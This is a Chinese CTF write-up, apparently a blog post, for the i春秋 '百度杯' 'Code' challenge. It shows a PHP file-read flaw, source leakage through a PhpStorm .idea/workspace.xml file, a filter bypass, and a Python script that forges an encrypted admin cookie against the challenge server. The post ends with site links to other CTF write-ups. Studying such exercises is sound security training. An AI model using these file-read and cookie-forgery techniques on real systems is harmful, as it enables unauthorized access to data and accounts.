题目在i春秋ctf大本营

打开链接是一张图片,审查元素发现关键词base64,图片的内容都以base64加密后的形式呈现,查看url形式,应该是一个文件读取的漏洞

这里我们可以采用url/index.php?jpg=index.php来获取index.php的源代码经base64加密后的代码

base64解密后得到如下源码:

<?php

/**

 * Created by PhpStorm.

 * Date: 2015/11/16

 * Time: 1:31

 */

header('content-type:text/html;charset=utf-8');

if(! isset($_GET['jpg']))

    header('Refresh:0;url=./index.php?jpg=hei.jpg');

$file = $_GET['jpg'];

echo '<title>file:'.$file.'</title>';

$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);

$file = str_replace("config","_", $file);

$txt = base64_encode(file_get_contents($file));

echo "<img src='data:image/gif;base64,".$txt."'></img>";

/*

 * Can you find the flag file?

 *

 */

?>

这里对jpg传入的file进行一些操作,现将除了数字字母以外的字符删除,接着将config替换成_,接着将file内容进行base64加密

这里的关键是注释中的“Created by PhpStorm”,因为phpstorm写的会有一个 .idea 文件夹,里面存储了一些配置文件

访问url/.idea/workspace.xml,可以看到与index.php同一文件夹下的还有config.php,fl3g_ichuqiu.php

由于上面的代码给出了过滤条件,说明我们这里不能读到config.php,但可以读取fl3g_ichuqiu.php,根据上述代码,_要用config代替

访问url/index.php?jpg=fl3gconfigichuqiu.php,得到源码:

<?php

/**

 * Created by PhpStorm.

 * Date: 2015/11/16

 * Time: 1:31

 */

error_reporting(E_ALL || ~E_NOTICE);

include('config.php');

function random($length, $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz') { //定义random函数,传入数字参数,返回相应位数的随机字符串

    $hash = '';

    $max = strlen($chars) - 1;

    for($i = 0; $i < $length; $i++)    {

        $hash .= $chars[mt_rand(0, $max)];

    }

    return $hash;

}

function encrypt($txt,$key){                                            //定义加密函数,先将传入的txt中的每个字符转ASCII码+10再转为字符串

    for($i=0;$i<strlen($txt);$i++){                                     //将四位随机字符+传入的key并对其进行md5加密生成新的key

        $tmp .= chr(ord($txt[$i])+10);                                  //将txt进行异或加密,结果返回base64编码过的ran+ttmp  

    }

    $txt = $tmp;

    $rnd=random(4);

    $key=md5($rnd.$key);

    $s=0;

    for($i=0;$i<strlen($txt);$i++){

        if($s == 32) $s = 0;

        $ttmp .= $txt[$i] ^ $key[++$s];

    }

    return base64_encode($rnd.$ttmp);

}

function decrypt($txt,$key){

    $txt=base64_decode($txt);

    $rnd = substr($txt,0,4);

    $txt = substr($txt,4);

    $key=md5($rnd.$key);

    $s=0;

    for($i=0;$i<strlen($txt);$i++){

        if($s == 32) $s = 0;

        $tmp .= $txt[$i]^$key[++$s];

    }

    for($i=0;$i<strlen($tmp);$i++){

        $tmp1 .= chr(ord($tmp[$i])-10);

    }

    return $tmp1;

}

$username = decrypt($_COOKIE['user'],$key);

if ($username == 'system'){

    echo $flag;

}else{

    setcookie('user',encrypt('guest',$key));

    echo "╮(╯▽╰)╭";

}

?>

这里的当务之急是要拿到输入的key的值,根据代码的最后一段:当cookie中user的值解密后不为system时,会给我们guest加密后的值,这就提醒我们key的前五位可以通过guest得知

给一下大佬的wp

# coding=utf-8

import base64

import requests

text = 'guest'

crypt = 'YldhV0lHV09O'

crypt = base64.b64decode(crypt)

rnd = crypt[0:4]

crypt = crypt[4:]

text1 = ''

for i in text:

    text1 += chr(ord(i) + 10)

key = ''

for (i, j) in zip(text1, crypt):

    key += chr(ord(i) ^ ord(j))

text = 'system'

text1 = ''

for i in text:

    text1 += chr(ord(i) +10)

cookies = []

for i in '0123456789abcdef':

    key1 = key + i

    tmp = ''

    for (j, k) in zip(text1, key1):

        tmp += chr(ord(j) ^ ord(k))

    cookies.append(base64.b64encode(rnd + tmp))

#r = requests.session()

for i in cookies:

    cookie = {'user':i}

    r = requests.session()

    result = r.get('http://2ec98f1fcd174a7c941546f366c1e55cc6935c1e07604c71.game.ichunqiu.com/fl3g_ichuqiu.php', cookies=cookie)

    print result.text

“百度杯”CTF比赛 九月场_Code(PhpStorm)的更多相关文章

  1. “百度杯”CTF比赛 九月场_YeserCMS

    题目在i春秋ctf大本营 题目的提示并没有什么卵用,打开链接发现其实是easycms,百度可以查到许多通用漏洞 这里我利用的是无限报错注入 访问url/celive/live/header.php,直 ...

  2. “百度杯”CTF比赛 九月场 code

    先去i春秋打开复现环境 打开链接,emmmmmmm(是我妹妹,逃~) 说正经的,jpg=hei.jpg 这一看就是文件包含. 我们先看看穹妹的源码吧 返回的是图片用base64译码的结果. <t ...

  3. “百度杯”CTF比赛 九月场_Test(海洋cms前台getshell)

    题目在i春秋ctf训练营 又是一道cms的通用漏洞的题,直接去百度查看通用漏洞 这里我使用的是以下这个漏洞: 海洋CMS V6.28代码执行0day 按照给出的payload,直接访问url+/sea ...

  4. “百度杯”CTF比赛 九月场_123(文件备份,爆破,上传)

    题目在i春秋ctf训练营 翻看源码,发现提示: 打开user.php,页面一片空白,参考大佬的博客才知道可能会存在user.php.bak的备份文件,下载该文件可以得到用户名列表 拿去burp爆破: ...

  5. “百度杯”CTF比赛 九月场_SQLi

    题目在i春秋ctf大本营 看网页源码提示: 这边是个大坑,访问login.php发现根本不存在注入点,看了wp才知道注入点在l0gin.php 尝试order by语句,发现3的时候页面发生变化,说明 ...

  6. “百度杯”CTF比赛 九月场_SQL

    题目在i春秋ctf大本营 题目一开始就提醒我们是注入,查看源码还给出了查询语句 输入测试语句发现服务器端做了过滤,一些语句被过滤了 试了一下/**/.+都不行,后来才发现可以用<>绕过 接 ...

  7. “百度杯”CTF比赛 九月场_再见CMS(齐博cms)

    题目在i春秋ctf大本营 又是一道cms的题,打开御剑一通乱扫,发现后台登录地址,访问一看妥妥的齐博cms 记得以前很久以前利用一个注入通用漏洞,这里我贴上链接,里面有原理与利用方法详细说明: 齐博c ...

  8. 从零开始学安全(三十四)●百度杯 ctf比赛 九月场 sqli

    先扫后台发现 两个可疑登录界面 l0gin.php login.php 猜测是第一个 用bp 抓包发现 index.php 中间有302 重定向 头文件 里面有一个 page=l0gin.php 应该 ...

  9. 百度杯”CTF比赛 九月场 123

    进去后让登录,先看源码有提示 进到user.php 后发现是空的,看了wp才知道,有bak 下载下来直接爆破 但是那个1990是蛮骚的 直接进去登录 登录成功后是空的,走fd看看是怎么过 的 改包然后 ...

随机推荐

  1. 在使用Qt5.8完成程序动态语言切换时遇到的问题

    因为之前了解过一些Qt国际化的东西,所以在写程序的时候需要显示给用户的字符都使用了 tr(" ")的形式,然后使用 Qt Linguist得到相应的 qm(Qt message)文 ...

  2. 初学MySQL基础知识笔记--01

    本人初入博客园,第一次写博客,在今后的时间里会一点点的提高自己博客的水平,以及博客的排版等. 在今天,我学习了一下MySQL数据库的基本知识,相信关于MySQL的资料网上会有很多,所以我就不在这里复制 ...

  3. 【详细】总结JavaWeb开发中SSH框架开发问题(用心总结,不容错过)

    在做JavaWeb的SSH框架开发的时候,遇到过很多的细节问题,这里大概记录下 我使用的IDE是Eclipse(老版本)三大框架:Spring4.Struts2.Hibernate5 1.web.xm ...

  4. Alpha冲刺——Day2

    一.合照 二.项目燃尽图 三.项目进展 图形界面基本完成 接口文档框架完成,接下来将会不断细化填充 登录界面向服务器请求数据进行ing 四.明日规划 1.注册登录接口能够完成 2.研究idea实现获得 ...

  5. C语言第三次作业--嵌套循环

    一.PTA实验作业 题目1:硬币数 1. 本题PTA提交列表 2. 设计思路 步骤一:定义整型变量fen5,fen2,fen1,表示1分2分和5分,零钱数额x,总硬币数total,换法count 步骤 ...

  6. 20145237 《Java程序设计》第九周学习总结

    20145237 <Java程序设计>第九周学习总结 教材学习内容总结 第十六章 整合数据库 JDBC入门 ·数据库本身是个独立运行的应用程序 ·撰写应用程序是利用通信协议对数据库进行指令 ...

  7. AWS EMR上搭建HBase环境

    0. 概述 AWS的EMR服务为客户提供的托管 Hadoop 框架可以让您轻松.快 速.经济高效地在多个动态可扩展的 Amazon EC2 实例之间分发和处理 大量数据.您还可以运行其他常用的分发框架 ...

  8. easyUI combobox 添加空白项

    今天测试反馈了一个问题,希望可以在下拉框下面加一个空白的选项(下拉框用的是combobox方法). 开始分析这个问题: 首先,这个数据都是后台读出来的,那么我在后台直接添加可以么,答案是可以的,如果没 ...

  9. C#中的函数式编程:递归与纯函数(二)

    在序言中,我们提到函数式编程的两大特征:无副作用.函数是第一公民.现在,我们先来深入第一个特征:无副作用. 无副作用是通过引用透明(Referential transparency)来定义的.如果一个 ...

  10. python小练习之三---购物车程序

    购物车购物的例子 严格来讲,这个例子相对大一些 功能也稍完备一些,具有用户登录,商品上架,用户购物,放入购物车,展示每个用户的购物车里的商品的数量,用户账户余额,支持用户账户充值等 下面展示的代码有些 ...